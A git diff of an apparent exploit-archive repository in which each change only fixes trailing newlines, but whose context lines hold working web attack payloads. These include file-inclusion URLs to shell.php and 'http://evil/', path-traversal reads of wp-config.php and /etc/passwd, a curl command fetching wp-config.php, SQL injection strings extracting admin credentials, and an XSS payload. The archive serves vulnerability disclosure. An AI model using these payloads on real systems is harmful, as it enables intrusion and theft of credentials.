3c4acf2a0..b3d0918a2 100755 --- a/platforms/php/webapps/39548.txt +++ b/platforms/php/webapps/39548.txt @@ -191,4 +191,4 @@ Content-Type=text/html; charset=UTF-8 5. Solution -Update to version 0.11 +Update to version 0.11 \ No newline at end of file diff --git a/platforms/php/webapps/3955.py b/platforms/php/webapps/3955.py index 64f88aa11..4d685f120 100755 --- a/platforms/php/webapps/3955.py +++ b/platforms/php/webapps/3955.py @@ -32,4 +32,4 @@ if (len(sys.argv) < 2): else: attack(sys.argv[1]) -# milw0rm.com [2007-05-20] +# milw0rm.com [2007-05-20] \ No newline at end of file diff --git a/platforms/php/webapps/39552.txt b/platforms/php/webapps/39552.txt index 2e005568a..0dad9a3d5 100755 --- a/platforms/php/webapps/39552.txt +++ b/platforms/php/webapps/39552.txt @@ -33,4 +33,4 @@ Google Dork inurl:themes/beauty-premium/ or detect via WPScan: -You will receive a 404 error after posting, but navigate to the sites upload directory and access your uploaded file directly. +You will receive a 404 error after posting, but navigate to the sites upload directory and access your uploaded file directly. \ No newline at end of file diff --git a/platforms/php/webapps/39558.txt b/platforms/php/webapps/39558.txt index 1b6deb9ec..4442a36cb 100755 --- a/platforms/php/webapps/39558.txt +++ b/platforms/php/webapps/39558.txt @@ -13,4 +13,4 @@ ====================================== Remote File Inclusion == http://localhost/wordpress/wp-content/plugins/site-import/admin/page.php?url=http%3a%2f%2flocalhost%2fshell.php?shell=ls Local File Inclusion == http://localhost/wordpress/wp-content/plugins/site-import/admin/page.php?url=..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\windows\win.ini -====================================== +====================================== \ No newline at end of file diff --git a/platforms/php/webapps/3956.php b/platforms/php/webapps/3956.php index 4603eca29..deb66d1db 100755 --- a/platforms/php/webapps/3956.php +++ b/platforms/php/webapps/3956.php @@ -136,4 +136,4 @@ echo 'You Can use this Session: '.$sess[0]; # Coded With BH Fast Generator v0.1 ?> -# milw0rm.com [2007-05-20] +# milw0rm.com [2007-05-20] \ No newline at end of file diff --git a/platforms/php/webapps/39567.txt b/platforms/php/webapps/39567.txt index 359b234e4..0d1afc988 100755 --- a/platforms/php/webapps/39567.txt +++ b/platforms/php/webapps/39567.txt @@ -130,4 +130,4 @@ csrf=685bba70d144b8b8727937b56f5b87e669135fe1&user_id=8&login=user&firstname=%22 3.Solution -No newer (fixed) versions are currently available. +No newer (fixed) versions are currently available. \ No newline at end of file diff --git a/platforms/php/webapps/3957.php b/platforms/php/webapps/3957.php index 0800b9951..438fc05b2 100755 --- a/platforms/php/webapps/3957.php +++ b/platforms/php/webapps/3957.php @@ -150,4 +150,4 @@ Password: $password[0] # Coded With BH Fast Generator v0.1 ?> -# milw0rm.com [2007-05-20] +# milw0rm.com [2007-05-20] \ No newline at end of file diff --git a/platforms/php/webapps/39575.txt b/platforms/php/webapps/39575.txt index 5dd38c880..dfb5e3430 100755 --- a/platforms/php/webapps/39575.txt +++ b/platforms/php/webapps/39575.txt @@ -13,4 +13,4 @@ http://localhost/wordpress/wp-content/plugins/ebook-download/readme.txt [PoC] ====================================== /wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=../../../wp-config.php -====================================== +====================================== \ No newline at end of file diff --git a/platforms/php/webapps/39576.txt b/platforms/php/webapps/39576.txt index 463c68929..056b6256f 100755 --- a/platforms/php/webapps/39576.txt +++ b/platforms/php/webapps/39576.txt @@ -16,4 +16,4 @@ Go to /wp-content/plugins/xml-and-csv-import-in-article-content/upload-process.p Click on the link "From an url". In "URL" field to write "../../../wp-config.php". Validate form and inspect the body. -====================================== +====================================== \ No newline at end of file diff --git a/platforms/php/webapps/3958.php b/platforms/php/webapps/3958.php index 44c68b51a..1863bcba8 100755 --- a/platforms/php/webapps/3958.php +++ b/platforms/php/webapps/3958.php @@ -177,4 +177,4 @@ echo 'Exploit worked, your new password for the admin user (ID: '.$adminID.') ha # Coded With BH Fast Generator v0.1 ?> -# milw0rm.com [2007-05-20] +# milw0rm.com [2007-05-20] \ No newline at end of file diff --git a/platforms/php/webapps/39580.txt b/platforms/php/webapps/39580.txt index 0972608a1..113bb4d2a 100755 --- a/platforms/php/webapps/39580.txt +++ b/platforms/php/webapps/39580.txt @@ -16,4 +16,4 @@ Cross Site Scripting (XSS): link: http://localhost/dorg/results.php?q=%27%22--%3E%3C%2fstyle%3E%3C%2fscRipt%3E%3CscRipt%3Ealert%280x00194A%29%3C%2fscRipt%3E&search=Search&type=3 -Screenshot: http://secupent.com/exploit/images/drogxss.jpg +Screenshot: http://secupent.com/exploit/images/drogxss.jpg \ No newline at end of file diff --git a/platforms/php/webapps/39583.txt b/platforms/php/webapps/39583.txt index 5b90a059e..64ab300a2 100755 --- a/platforms/php/webapps/39583.txt +++ b/platforms/php/webapps/39583.txt @@ -83,4 +83,4 @@ vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and prohibits any malicious use of all security related information -or exploits by the author or elsewhere. (c) hyp3rlinx. +or exploits by the author or elsewhere. (c) hyp3rlinx. \ No newline at end of file diff --git a/platforms/php/webapps/39584.txt b/platforms/php/webapps/39584.txt index 630ff41bb..37bde5090 100755 --- a/platforms/php/webapps/39584.txt +++ b/platforms/php/webapps/39584.txt @@ -30,4 +30,4 @@ Simply add the get parameter file: localhost/wp/wp-content/plugins/image-export/download.php?file=../../../wp-config.php -Found by AMAR^SHG (Shkupi Hackers Group) +Found by AMAR^SHG (Shkupi Hackers Group) \ No newline at end of file diff --git a/platforms/php/webapps/3959.php b/platforms/php/webapps/3959.php index 81236f90e..42b032446 100755 --- a/platforms/php/webapps/3959.php +++ b/platforms/php/webapps/3959.php @@ -348,4 +348,4 @@ die ('Error: Can\'t retrieve Shell Path'); # Coded With BH Fast Generator v0.1 ?> -# milw0rm.com [2007-05-20] +# milw0rm.com [2007-05-20] \ No newline at end of file diff --git a/platforms/php/webapps/39591.txt b/platforms/php/webapps/39591.txt index 6d28df951..3b7e3c625 100755 --- a/platforms/php/webapps/39591.txt +++ b/platforms/php/webapps/39591.txt @@ -32,4 +32,4 @@ http://localhost/wp/wp-content/plugins/brandfolder/callback.php?wp_abspath=../.. http://localhost/wp/wp-content/plugins/brandfolder/callback.php?wp_abspath=http://evil/ Discovered by AMAR^SHG (aka kuroi'sh). -Greetings to RxR & Nofawkx Al & HolaKo +Greetings to RxR & Nofawkx Al & HolaKo \ No newline at end of file diff --git a/platforms/php/webapps/39592.txt b/platforms/php/webapps/39592.txt index 4866a0900..88699d9ea 100755 --- a/platforms/php/webapps/39592.txt +++ b/platforms/php/webapps/39592.txt @@ -23,4 +23,4 @@ require_once($_GET['gateway'].'.php'); // POC: http://localhost/wp/dharma-booking/frontend/ajax/gateways/proccess.php?gateway=LFI/RFI -http://localhost/wp/dharma-booking/frontend/ajax/gateways/proccess.php?gateway=../../../../../../etc/passwd%00 +http://localhost/wp/dharma-booking/frontend/ajax/gateways/proccess.php?gateway=../../../../../../etc/passwd%00 \ No newline at end of file diff --git a/platforms/php/webapps/39593.txt b/platforms/php/webapps/39593.txt index d10138371..79893cad9 100755 --- a/platforms/php/webapps/39593.txt +++ b/platforms/php/webapps/39593.txt @@ -31,4 +31,4 @@ or if the plugin is not installed in the root folder of wordpress, for example in the folder "mdocs-posts": curl http://example.site.com/mdocs-posts/?mdocs-img-preview=../../../wp-config.php --o example-wp-config.php +-o example-wp-config.php \ No newline at end of file diff --git a/platforms/php/webapps/3960.php b/platforms/php/webapps/3960.php index 5c12639ef..92a70de9e 100755 --- a/platforms/php/webapps/3960.php +++ b/platforms/php/webapps/3960.php @@ -285,4 +285,4 @@ function add_line($buf) /////////////////////////////////////////////////////////////////////// ?> -# milw0rm.com [2007-05-21] +# milw0rm.com [2007-05-21] \ No newline at end of file diff --git a/platforms/php/webapps/3962.txt b/platforms/php/webapps/3962.txt index 3285dfc70..a3f41ea2a 100755 --- a/platforms/php/webapps/3962.txt +++ b/platforms/php/webapps/3962.txt @@ -38,4 +38,4 @@ Download script : #Miro_Tiger[at]Hotmail[dot]com -# milw0rm.com [2007-05-21] +# milw0rm.com [2007-05-21] \ No newline at end of file diff --git a/platforms/php/webapps/3963.txt b/platforms/php/webapps/3963.txt index 7b375b256..193183530 100755 --- a/platforms/php/webapps/3963.txt +++ b/platforms/php/webapps/3963.txt @@ -34,4 +34,4 @@ # # ################################################################################# -# milw0rm.com [2007-05-21] +# milw0rm.com [2007-05-21] \ No newline at end of file diff --git a/platforms/php/webapps/3964.txt b/platforms/php/webapps/3964.txt index 279dc1b79..af032a54d 100755 --- a/platforms/php/webapps/3964.txt +++ b/platforms/php/webapps/3964.txt @@ -24,4 +24,4 @@ Example: http://www.blex.co.uk/bookmarks thanx: ThE TiGeR couse he found RFI to this script:) ========================================================================== -# milw0rm.com [2007-05-21] +# milw0rm.com [2007-05-21] \ No newline at end of file diff --git a/platforms/php/webapps/39676.txt b/platforms/php/webapps/39676.txt index 7bcc3aca3..7cae5b93d 100755 --- a/platforms/php/webapps/39676.txt +++ b/platforms/php/webapps/39676.txt @@ -135,4 +135,4 @@ The author is not responsible for any misuse of the information contained herein and prohibits any malicious use of all security related information or exploits by the author or elsewhere. -hyp3rlinx +hyp3rlinx \ No newline at end of file diff --git a/platforms/php/webapps/39678.txt b/platforms/php/webapps/39678.txt index 1a5f887db..365d7a940 100755 --- a/platforms/php/webapps/39678.txt +++ b/platforms/php/webapps/39678.txt @@ -110,4 +110,4 @@ The author is not responsible for any misuse of the information contained herein and prohibits any malicious use of all security related information or exploits by the author or elsewhere. -hyp3rlinx +hyp3rlinx \ No newline at end of file diff --git a/platforms/php/webapps/39679.txt b/platforms/php/webapps/39679.txt index cd8dbd752..28731b78b 100755 --- a/platforms/php/webapps/39679.txt +++ b/platforms/php/webapps/39679.txt @@ -45,4 +45,4 @@ Note: ------------ Exploit only works if PHP JSON extension is not installed. -Video: https://youtu.be/1Ai09IQK4C0 +Video: https://youtu.be/1Ai09IQK4C0 \ No newline at end of file diff --git a/platforms/php/webapps/39682.txt b/platforms/php/webapps/39682.txt index c21592497..cd44d8f8b 100755 --- a/platforms/php/webapps/39682.txt +++ b/platforms/php/webapps/39682.txt @@ -391,4 +391,4 @@ return plus; }"/> -######################################################################################################################################################### +######################################################################################################################################################### \ No newline at end of file diff --git a/platforms/php/webapps/39688.txt b/platforms/php/webapps/39688.txt index a5ee7669d..3cb2f95e6 100755 --- a/platforms/php/webapps/39688.txt +++ b/platforms/php/webapps/39688.txt @@ -21,4 +21,4 @@ The problem: The GLOBALS[babInstallPath]-parameter isn't declared before require Declare this parameter or use an alert! -Greetings from bd0rk. HackThePlanet! +Greetings from bd0rk. HackThePlanet! \ No newline at end of file diff --git a/platforms/php/webapps/3970.txt b/platforms/php/webapps/3970.txt index dc3d6eb65..3cbd2a1d8 100755 --- a/platforms/php/webapps/3970.txt +++ b/platforms/php/webapps/3970.txt @@ -26,4 +26,4 @@ # ################################################################################# -# milw0rm.com [2007-05-22] +# milw0rm.com [2007-05-22] \ No newline at end of file diff --git a/platforms/php/webapps/39704.txt b/platforms/php/webapps/39704.txt index 4734c5b31..96c414434 100755 --- a/platforms/php/webapps/39704.txt +++ b/platforms/php/webapps/39704.txt @@ -114,4 +114,4 @@ empty resulting in CSRF vulnerability. # Author email: cor3sm4sh3r[at]gmail.com # Contact: https://in.linkedin.com/in/cor3sm4sh3r -# Twitter: https://twitter.com/cor3sm4sh3r +# Twitter: https://twitter.com/cor3sm4sh3r \ No newline at end of file diff --git a/platforms/php/webapps/39707.txt b/platforms/php/webapps/39707.txt index 2fd1364e1..8802f5498 100755 --- a/platforms/php/webapps/39707.txt +++ b/platforms/php/webapps/39707.txt @@ -46,5 +46,4 @@ method="POST"> 11 Apr 2016 - Vulnerability discover. 11 Apr 2016 - No main contact available on vendor web page. Ask related contact that shown on vendor web page instead. -18 Apr 2016 - No response from related contact and vulnerability disclosed. - +18 Apr 2016 - No response from related contact and vulnerability disclosed. \ No newline at end of file diff --git a/platforms/php/webapps/3971.php b/platforms/php/webapps/3971.php index 96a39fc08..3b6b67bc5 100755 --- a/platforms/php/webapps/3971.php +++ b/platforms/php/webapps/3971.php @@ -632,4 +632,4 @@ Echo "[!] Shell : http://".$host.$path."data/config.php?shell=Evil Text\r\n"; ?> -# milw0rm.com [2007-05-23] +# milw0rm.com [2007-05-23] \ No newline at end of file diff --git a/platforms/php/webapps/39710.txt b/platforms/php/webapps/39710.txt index 0ac8b2c26..5f37f3470 100755 --- a/platforms/php/webapps/39710.txt +++ b/platforms/php/webapps/39710.txt @@ -85,7 +85,4 @@ http://127.0.0.1/shop/api/easybill/easybillcsv.php?token=MODULE_EASYBILL_CSV_CRO Timeline ----- -[16.04.2016] Reporting vulnerability to vendor - - - +[16.04.2016] Reporting vulnerability to vendor \ No newline at end of file diff --git a/platforms/php/webapps/3972.txt b/platforms/php/webapps/3972.txt index b7dd7d81f..992940238 100755 --- a/platforms/php/webapps/3972.txt +++ b/platforms/php/webapps/3972.txt @@ -52,4 +52,4 @@ ############################################################################################## ############################################################################################## -# milw0rm.com [2007-05-23] +# milw0rm.com [2007-05-23] \ No newline at end of file diff --git a/platforms/php/webapps/39737.txt b/platforms/php/webapps/39737.txt index 0c8f4a86b..d32e96e55 100755 --- a/platforms/php/webapps/39737.txt +++ b/platforms/php/webapps/39737.txt @@ -81,4 +81,4 @@ warranties or guarantees of fitness of use or otherwise. XIII. ABOUT ------------------------- Manuel Garcia Cardenas -Pentester +Pentester \ No newline at end of file diff --git a/platforms/php/webapps/3974.pl b/platforms/php/webapps/3974.pl index a55af5d9f..5796b29b4 100755 --- a/platforms/php/webapps/3974.pl +++ b/platforms/php/webapps/3974.pl @@ -82,4 +82,4 @@ else { print "\nExploit Failed...\n"; } -# milw0rm.com [2007-05-23] +# milw0rm.com [2007-05-23] \ No newline at end of file diff --git a/platforms/php/webapps/39744.html b/platforms/php/webapps/39744.html index 7218b3875..6cf61be00 100755 --- a/platforms/php/webapps/39744.html +++ b/platforms/php/webapps/39744.html @@ -33,4 +33,4 @@ method="POST"> - + \ No newline at end of file diff --git a/platforms/php/webapps/39745.txt b/platforms/php/webapps/39745.txt index b8d1a875a..dc946a641 100755 --- a/platforms/php/webapps/39745.txt +++ b/platforms/php/webapps/39745.txt @@ -103,6 +103,4 @@ ls -l /opt total 48944 drwxrwxr-x 12 1000 1000 4096 Apr 27 13:47 observium -rw-r--r-- 1 root root 50107191 Jan 27 07:35 observium-community-latest.tar.gz -drwxr-xr-x. 2 root root 4096 Mar 26 2015 rh - - +drwxr-xr-x. 2 root root 4096 Mar 26 2015 rh \ No newline at end of file diff --git a/platforms/php/webapps/39759.txt b/platforms/php/webapps/39759.txt index 92d89be8a..ed34219bc 100755 --- a/platforms/php/webapps/39759.txt +++ b/platforms/php/webapps/39759.txt @@ -16,5 +16,4 @@ or add a new news : http://server/admin/hot_news_menu.php?tmp=1 or edit news : -http://server/admin/edit_hot_news.php?hotnewsid=44&tmp=1 - +http://server/admin/edit_hot_news.php?hotnewsid=44&tmp=1 \ No newline at end of file diff --git a/platforms/php/webapps/39761.txt b/platforms/php/webapps/39761.txt index ba7f0bf39..995c57bcc 100755 --- a/platforms/php/webapps/39761.txt +++ b/platforms/php/webapps/39761.txt @@ -35,4 +35,4 @@ https://www.youtube.com/watch?v=L8t3_HGriP8&feature=youtu.be 4. Solution -Update to version 4.5.1 +Update to version 4.5.1 \ No newline at end of file diff --git a/platforms/php/webapps/39766.php b/platforms/php/webapps/39766.php index a7bc2b719..a1db57564 100755 --- a/platforms/php/webapps/39766.php +++ b/platforms/php/webapps/39766.php @@ -46,5 +46,4 @@ $thumb->clear(); $thumb->destroy(); echo file_get_contents($data_file); -?> - +?> \ No newline at end of file diff --git a/platforms/php/webapps/39781.txt b/platforms/php/webapps/39781.txt index b41f257b7..319a7fc33 100755 --- a/platforms/php/webapps/39781.txt +++ b/platforms/php/webapps/39781.txt @@ -65,5 +65,4 @@ name="settings_eval_tab_eval-submitted" value="1" /> - - + \ No newline at end of file diff --git a/platforms/php/webapps/3980.pl b/platforms/php/webapps/3980.pl index 21e0e933b..cc7669887 100755 --- a/platforms/php/webapps/3980.pl +++ b/platforms/php/webapps/3980.pl @@ -84,4 +84,4 @@ else { print "\nExploit Failed...\n"; } -# milw0rm.com [2007-05-24] +# milw0rm.com [2007-05-24] \ No newline at end of file diff --git a/platforms/php/webapps/39806.txt b/platforms/php/webapps/39806.txt index 103f2537f..b22aa13a0 100755 --- a/platforms/php/webapps/39806.txt +++ b/platforms/php/webapps/39806.txt @@ -67,5 +67,4 @@ btnOrderPages=Click+to+Reorder+FAQs&hdnfaqpageorder=id_8%2Cid_6%2Cid_5&hdnParent ##### References ##### https://www.owasp.org/index.php/Full_Path_Disclosure -https://www.owasp.org/index.php/SQL_Injection - +https://www.owasp.org/index.php/SQL_Injection \ No newline at end of file diff --git a/platforms/php/webapps/39807.txt b/platforms/php/webapps/39807.txt index 481b22a66..956266c0a 100755 --- a/platforms/php/webapps/39807.txt +++ b/platforms/php/webapps/39807.txt @@ -58,5 +58,4 @@ Some system drop those headers. ##### References ##### https://www.owasp.org/index.php/Full_Path_Disclosure -https://www.owasp.org/index.php/SQL_Injection - +https://www.owasp.org/index.php/SQL_Injection \ No newline at end of file diff --git a/platforms/php/webapps/3981.php b/platforms/php/webapps/3981.php index 4c935be16..0aaeb62e4 100755 --- a/platforms/php/webapps/3981.php +++ b/platforms/php/webapps/3981.php @@ -153,4 +153,4 @@ $email=$t2[0]; echo "Admin E-Mail: ".$email."\r\n"; ?> -# milw0rm.com [2007-05-24] +# milw0rm.com [2007-05-24] \ No newline at end of file diff --git a/platforms/php/webapps/39813.txt b/platforms/php/webapps/39813.txt index 6ffaf26ac..34e1c44f0 100755 --- a/platforms/php/webapps/39813.txt +++ b/platforms/php/webapps/39813.txt @@ -280,5 +280,4 @@ XII. LEGAL NOTICES The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. I accept no -responsibility for any damage caused by the use or misuse of this information. - +responsibility for any damage caused by the use or misuse of this information. \ No newline at end of file diff --git a/platforms/php/webapps/3983.txt b/platforms/php/webapps/3983.txt index 90b6efc44..f2903cbcc 100755 --- a/platforms/php/webapps/3983.txt +++ b/platforms/php/webapps/3983.txt @@ -38,4 +38,4 @@ Gr33tz : Dr.Trojan , Hiv++ , D_7j , L0rd , RezaYavari , Vpc , And all I ********************************************************************************************************** -# milw0rm.com [2007-05-24] +# milw0rm.com [2007-05-24] \ No newline at end of file diff --git a/platforms/php/webapps/39849.txt b/platforms/php/webapps/39849.txt index 6a5bacd47..a17884244 100755 --- a/platforms/php/webapps/39849.txt +++ b/platforms/php/webapps/39849.txt @@ -81,5 +81,4 @@ Update to the latest version v1.4.2 9. REFERENCES ============= https://github.com/Contex/XenAPI/commit/00a737a1fe45ffe5c5bc6bace44631ddb73f2ecf -https://xenforo.com/community/resources/xenapi-xenforo-php-rest-api.902/update?update=19336 - +https://xenforo.com/community/resources/xenapi-xenforo-php-rest-api.902/update?update=19336 \ No newline at end of file diff --git a/platforms/php/webapps/39864.txt b/platforms/php/webapps/39864.txt index 9d551055e..65c2f4c51 100755 --- a/platforms/php/webapps/39864.txt +++ b/platforms/php/webapps/39864.txt @@ -13,4 +13,4 @@ http://server/single.php?view_id=-57+/*!50000union*/+select+1,2,user_name,4,5,6, Admin Panel : http://server/admin/ Username : admin -Password : inetsol +Password : inetsol \ No newline at end of file diff --git a/platforms/php/webapps/39868.txt b/platforms/php/webapps/39868.txt index c17794686..0719e66cc 100755 --- a/platforms/php/webapps/39868.txt +++ b/platforms/php/webapps/39868.txt @@ -12,6 +12,4 @@ http://server/[path]/contact_view.php?contact=-99999+[SQl+Command] Test : http://server/contact_view.php?contact=-25527%27+/*!50000union*/+select+1,2,3,4,5,6,7,8,9,10,11,10,13,14,15,16,17,18,19,20,username,22,password,24,25,26,27,28,29,30,31,32,33,34,35,36,37+/*!50000from*/+/*!50000admin_login*/%23 -Admin Panel : http://server/admin/ - - +Admin Panel : http://server/admin/ \ No newline at end of file diff --git a/platforms/php/webapps/3987.txt b/platforms/php/webapps/3987.txt index a40df8c0a..2f7740ae5 100755 --- a/platforms/php/webapps/3987.txt +++ b/platforms/php/webapps/3987.txt @@ -12,4 +12,4 @@ #Miro_Tiger[at]Hotmail.com -# milw0rm.com [2007-05-25] +# milw0rm.com [2007-05-25] \ No newline at end of file diff --git a/platforms/php/webapps/39870.html b/platforms/php/webapps/39870.html index 7863ea6e5..9bed7155e 100755 --- a/platforms/php/webapps/39870.html +++ b/platforms/php/webapps/39870.html @@ -143,4 +143,4 @@ function upload(){ ZSL-2016-5328 - + \ No newline at end of file diff --git a/platforms/php/webapps/39876.txt b/platforms/php/webapps/39876.txt index 14de9b694..fee166b94 100755 --- a/platforms/php/webapps/39876.txt +++ b/platforms/php/webapps/39876.txt @@ -174,4 +174,4 @@ for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. -hyp3rlinx +hyp3rlinx \ No newline at end of file diff --git a/platforms/php/webapps/3988.php b/platforms/php/webapps/3988.php index 42039a234..d7c820a8a 100755 --- a/platforms/php/webapps/3988.php +++ b/platforms/php/webapps/3988.php @@ -243,4 +243,4 @@ if($exploit==1){ } ?> -# milw0rm.com [2007-05-25] +# milw0rm.com [2007-05-25] \ No newline at end of file diff --git a/platforms/php/webapps/39883.txt b/platforms/php/webapps/39883.txt index 3aa94f93d..66cbe9916 100755 --- a/platforms/php/webapps/39883.txt +++ b/platforms/php/webapps/39883.txt @@ -87,4 +87,4 @@ http://127.0.0.1//wp-admin/tools.php?page=backup_manager&download_backu CVSS v2 Vector (AV:N/AC:L/Au:N/C:P/I:N/A:N) CVSS Base Score : 5 Impact Subscore : 2.9 -Exploitability Subscore : 10 +Exploitability Subscore : 10 \ No newline at end of file diff --git a/platforms/php/webapps/3989.pl b/platforms/php/webapps/3989.pl index 87b2469b7..c4829ee71 100755 --- a/platforms/php/webapps/3989.pl +++ b/platforms/php/webapps/3989.pl @@ -80,4 +80,4 @@ else { print "\nExploit Failed...\n"; } -# milw0rm.com [2007-05-25] +# milw0rm.com [2007-05-25] \ No newline at end of file diff --git a/platforms/php/webapps/39890.txt b/platforms/php/webapps/39890.txt index fe3c45208..025c737e3 100755 --- a/platforms/php/webapps/39890.txt +++ b/platforms/php/webapps/39890.txt @@ -19,4 +19,4 @@ http://localhost/{PATH}/admin [+]Exploit by: Ali Ghanbari -[+]My Telegram :@Exploiter007 +[+]My Telegram :@Exploiter007 \ No newline at end of file diff --git a/platforms/php/webapps/39891.txt b/platforms/php/webapps/39891.txt index 830bfac6c..6b4aa2687 100755 --- a/platforms/php/webapps/39891.txt +++ b/platforms/php/webapps/39891.txt @@ -29,6 +29,4 @@ Go to: and it will get saved in directory: -/wp-content/plugins/wp-mobile-detector/cache/shell.php - - +/wp-content/plugins/wp-mobile-detector/cache/shell.php \ No newline at end of file diff --git a/platforms/php/webapps/39892.php b/platforms/php/webapps/39892.php index d41e856dd..ee1cbbf77 100755 --- a/platforms/php/webapps/39892.php +++ b/platforms/php/webapps/39892.php @@ -195,4 +195,4 @@ JQ.ajax({ -$j(document).ready(function(){ +$j(document).ready(function(){ \ No newline at end of file diff --git a/platforms/php/webapps/39893.php b/platforms/php/webapps/39893.php index c07bcf3b8..2315a12b1 100755 --- a/platforms/php/webapps/39893.php +++ b/platforms/php/webapps/39893.php @@ -172,6 +172,4 @@ Examples: EOD; echo $help."\n\n"; die(); -} - - +} \ No newline at end of file diff --git a/platforms/php/webapps/39894.php b/platforms/php/webapps/39894.php index 78b933a4b..1ffc5bbe5 100755 --- a/platforms/php/webapps/39894.php +++ b/platforms/php/webapps/39894.php @@ -122,4 +122,4 @@ Examples: EOD; echo $help."\n\n"; die(); -} +} \ No newline at end of file diff --git a/platforms/php/webapps/39895.php b/platforms/php/webapps/39895.php index 16ffc6b3f..a3076fa5c 100755 --- a/platforms/php/webapps/39895.php +++ b/platforms/php/webapps/39895.php @@ -149,4 +149,4 @@ Examples: EOD; echo $help."\n\n"; die(); -} +} \ No newline at end of file diff --git a/platforms/php/webapps/39899.txt b/platforms/php/webapps/39899.txt index 2dad76819..c4224c3df 100755 --- a/platforms/php/webapps/39899.txt +++ b/platforms/php/webapps/39899.txt @@ -265,4 +265,4 @@ hold onto releasing the advisory.” | Additional | +------------+ Further information is available in the accompanying PDF. -http://www.security-assessment.com/files/documents/advisory/NagiosXI-Advisory.pdf +http://www.security-assessment.com/files/documents/advisory/NagiosXI-Advisory.pdf \ No newline at end of file diff --git a/platforms/php/webapps/3990.txt b/platforms/php/webapps/3990.txt index 9b4743386..18f195a6f 100755 --- a/platforms/php/webapps/3990.txt +++ b/platforms/php/webapps/3990.txt @@ -27,4 +27,4 @@ Thanx: Green eyas amor , Titanichacker , hacaaar , Hack Back , Mohammad Sallah , RoMaNcYxHaCkEr , mR wEsAm X , Mr.E-vil Thanx: Team Hell Members (ConviCt & jEdDaWi & Black Shell & Hackers Cool & Dr.killer & Red Hat) -# milw0rm.com [2007-05-25] +# milw0rm.com [2007-05-25] \ No newline at end of file diff --git a/platforms/php/webapps/39905.txt b/platforms/php/webapps/39905.txt index 21604bae1..710c4fb81 100755 --- a/platforms/php/webapps/39905.txt +++ b/platforms/php/webapps/39905.txt @@ -49,4 +49,4 @@ available databases [25]: [*] ''' [*] api [*] blackcat -[*] edusec +[*] edusec \ No newline at end of file diff --git a/platforms/php/webapps/3991.txt b/platforms/php/webapps/3991.txt index 6135e03f7..700c17c2d 100755 --- a/platforms/php/webapps/3991.txt +++ b/platforms/php/webapps/3991.txt @@ -22,4 +22,4 @@ Http://localhost/[PATH]/development.php?root_prefix=http://Shellz? Gr33tz : Dr.Trojan , Hiv++ , D_7j , L0rd , RezaYavari , Vpc , all IRANIAN Hackers , and all Enemy ********************************************************************************************************** -# milw0rm.com [2007-05-25] +# milw0rm.com [2007-05-25] \ No newline at end of file diff --git a/platforms/php/webapps/39912.html b/platforms/php/webapps/39912.html index 452862f2c..60e57c28b 100755 --- a/platforms/php/webapps/39912.html +++ b/platforms/php/webapps/39912.html @@ -28,4 +28,4 @@ Host User % exploit_user1 ---> +--> \ No newline at end of file diff --git a/platforms/php/webapps/3992.txt b/platforms/php/webapps/3992.txt index e4a5d6082..e9da26081 100755 --- a/platforms/php/webapps/3992.txt +++ b/platforms/php/webapps/3992.txt @@ -51,4 +51,4 @@ # # ############################################################################################## -# milw0rm.com [2007-05-25] +# milw0rm.com [2007-05-25] \ No newline at end of file diff --git a/platforms/php/webapps/39932.html b/platforms/php/webapps/39932.html index 611aacbec..5a759b000 100755 --- a/platforms/php/webapps/39932.html +++ b/platforms/php/webapps/39932.html @@ -54,4 +54,4 @@ http://localhost/images/[your shell] [+]Exploit by: Ali Ghanbari [+]My Telegram :@Exploiter007 ---> +--> \ No newline at end of file diff --git a/platforms/php/webapps/3994.txt b/platforms/php/webapps/3994.txt index 568d3c3e8..ce2cd8eb3 100755 --- a/platforms/php/webapps/3994.txt +++ b/platforms/php/webapps/3994.txt @@ -14,4 +14,4 @@ #Miro_Tiger[at]Hotmail.com -# milw0rm.com [2007-05-26] +# milw0rm.com [2007-05-26] \ No newline at end of file diff --git a/platforms/php/webapps/39948.txt b/platforms/php/webapps/39948.txt index 354c97aae..a178630d3 100755 --- a/platforms/php/webapps/39948.txt +++ b/platforms/php/webapps/39948.txt @@ -25,4 +25,4 @@ Content-Length: 10 Cookie: PHPSESSID=3oecem8o5c8975dcufbb0moqn5 Connection: keep-alive -msg=654asd +msg=654asd \ No newline at end of file diff --git a/platforms/php/webapps/39949.html b/platforms/php/webapps/39949.html index d370a7e46..b69e09322 100755 --- a/platforms/php/webapps/39949.html +++ b/platforms/php/webapps/39949.html @@ -46,5 +46,4 @@ written - - + \ No newline at end of file diff --git a/platforms/php/webapps/3995.txt b/platforms/php/webapps/3995.txt index 8a13a55df..c2f1602e3 100755 --- a/platforms/php/webapps/3995.txt +++ b/platforms/php/webapps/3995.txt @@ -43,4 +43,4 @@ include ("$site_url/trofimov.php"); include ("$site_url/narod.php"); << search page -http://127.0.0.1/vul_test/w2wiki/index.php?action=search&q="> +http://127.0.0.1/vul_test/w2wiki/index.php?action=search&q="> \ No newline at end of file diff --git a/platforms/php/webapps/39952.txt b/platforms/php/webapps/39952.txt index 223554fa7..774df0aff 100755 --- a/platforms/php/webapps/39952.txt +++ b/platforms/php/webapps/39952.txt @@ -35,4 +35,4 @@ current database: 'dokeos_main' [22:25:09] [INFO] fetched data logged to text files under 'C:\Users\Mort\.sqlmap\output\hackme.com' C:\Users\Mort\Desktop\Apps\sqlmap> ------- +------ \ No newline at end of file diff --git a/platforms/php/webapps/39955.txt b/platforms/php/webapps/39955.txt index 4c8af8bf6..925f2fd14 100755 --- a/platforms/php/webapps/39955.txt +++ b/platforms/php/webapps/39955.txt @@ -273,4 +273,4 @@ current password. -- Sr. Information Security Engineer -https://www.mehmetince.net +https://www.mehmetince.net \ No newline at end of file diff --git a/platforms/php/webapps/39956.txt b/platforms/php/webapps/39956.txt index ccddec10d..73367ab98 100755 --- a/platforms/php/webapps/39956.txt +++ b/platforms/php/webapps/39956.txt @@ -54,4 +54,4 @@ Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 